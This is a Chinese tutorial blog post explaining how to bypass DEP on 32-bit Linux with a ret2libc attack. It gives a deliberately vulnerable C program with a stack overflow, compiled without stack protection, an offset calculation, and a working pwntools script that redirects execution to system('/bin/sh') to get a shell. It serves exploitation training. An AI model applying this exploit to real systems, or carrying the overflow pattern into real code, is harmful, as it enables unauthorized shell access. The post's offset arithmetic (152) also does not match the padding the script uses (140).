• Linux下利用Ret2Libc绕过DEP


    Linux下利用Ret2Libc绕过DEP

    ⑴.  原理分析:

    系统库函数通常是不受DEP(关于DEP,可以查看我之前文章的详细介绍)保护的,所以通过将返回地址指向系统函数可以绕过DEP保护,所以可以通过调研系统函数system()获得shell。

    ⑵.环境准备:

    i.漏洞代码:

    #include <stdio.h>

    #include <stdlib.h>

    #include <unistd.h>

    #include <string.h>

    void flow(){

        char buf[128];

        read(STDIN_FILENO,buf,256);

    }

    int main(){

        flow();

        char a[]="hello";

        write(STDOUT_FILENO,a,strlen(a));

        return 0;

    }

    编译指令:

    gcc -fno-stack-protector -g -m32 -o vuln vuln.c

    ii.测试环境:

    测试系统:kaii 2.0 rolling

    辅助插件:peda

    ⑶.测试分析:

    i.存在漏洞的函数flow返回地址:

     

    漏洞函数返回地址:0xffffd2ac。

    ii.缓冲区起始地址:

     

    缓冲区起始地址:0xffffd220

    iii. 系统函数system()地址

     

    iv.System参数:”/bin/sh”

     

    v. system函数源码:

    int system(const char * cmdstring)

     {

         pid_t pid;

         int status;

         if(cmdstring == NULL){       

              return (1);

         }

         if((pid = fork())<0){

                 status = -1;

         }

         else if(pid == 0){

             execl("/bin/sh", "sh", "-c", cmdstring, (char *)0);

             _exit(127); //子进程正常执行则不会执行此语句

            }

         else{

                 while(waitpid(pid, &status, 0) < 0){

                       if(errno != EINTER){

                         status = -1;

                         break;

                     }

                 }

             }

             return status;

     }

    ⑷.攻击过程:

    i.计算攻击shellcode长度:

    我们的目的是用system函数的地址覆盖返回地址,将system函数后的参数地址(后8字节,后四字节是返回地址)覆盖为我们找到的”/bin/sh”的地址。

    所以size(shellcode)= address(ret)- address(buff)+ 12 = 0xffffd2ac – 0xffffd220 + 12 = 152

    ii. 设计shellcode结构:

     

    注:因为我们劫持程序后获得shell之后不会再返回,所以addr(ret:system)可以是任意地址。

    iii.编写漏洞利用脚本:

    from pwn import *

    sh = 0xf7f4a808

    system = 0xf7e0bc70

    ret = 0x565555d4

    payload = 'a'*140+p32(system)+p32(ret)+p32(sh)

    p = process('./vuln')

    p.send(payload)

    p.interactive()

    执行:

    成功。

  • 相关阅读:
    MySQL查询所有库中表名
    MySQL统计数据库表大小
    Spring Cloud 自定义ConfigServer 解决敏感信息存储问题
    JQuery Ajax执行过程AOP拦截
    虚拟机下的centos断电(非正常关机)后mysql启动不了
    Ubuntu 13.10 如何修改背景色--豆沙绿
    CI框架CodeIgniter伪静态各种服务器设置
    MongoDB中MapReduce不同的写法,不同的结果
    分享个人预算系统源码(含说明文档)
    Java lambda 分组后多列求和
  • 原文地址:https://www.cnblogs.com/zhang293/p/9156511.html
Copyright © 2020-2023  润新知